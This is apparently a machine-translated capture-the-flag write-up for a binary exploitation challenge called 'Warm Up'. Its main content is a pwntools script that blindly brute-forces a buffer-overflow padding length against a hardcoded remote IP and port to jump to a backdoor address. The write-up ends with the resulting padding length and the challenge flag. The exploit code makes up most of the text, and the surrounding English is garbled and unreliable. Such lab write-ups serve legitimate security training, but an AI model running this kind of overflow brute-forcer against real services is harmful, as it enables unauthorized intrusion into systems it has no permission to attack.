This problem no binary files
easiest comfortably pwn a problem . Although difficult subject I will not
have only one ip and a port
nc connection to go up
discovery process will give us a return address
guess this address is the address of the function of the back door
wrote a blasting procedure
from pwn import *
def blast(ip,port,padd_start,padd_end,addr):
for i in range(padd_start,padd_end):
try:
p = remote(ip,port)
p.recvuntil(">")
payload = 'a' * i + p32(addr)
print("32bit payload len =",i)
p.sendline(payload)
r = p.recv()
if "Warm Up" in r:
continue
print('recv::length='+ str(len(r)) + ',content='+ r)
p.close()
break
except Exception as e:
p.close()
try:
p = remote(ip,port)
p.recvuntil(">")
payload = 'a' * i + p64(addr)
print("64bit payload len =",i)
p.sendline(payload)
r = p.recv()
if "Warm Up" in r:
continue
print('recv: ' + r)
p.close()
break
except Exception as e:
p.close()
blast("111.198.29.45",54880,0,200,0x40060d)
Blasting Results
padding length is 72, the program 64 is a program
flag:
cyberpeace{3c720a366924ded4e8cab660474da845}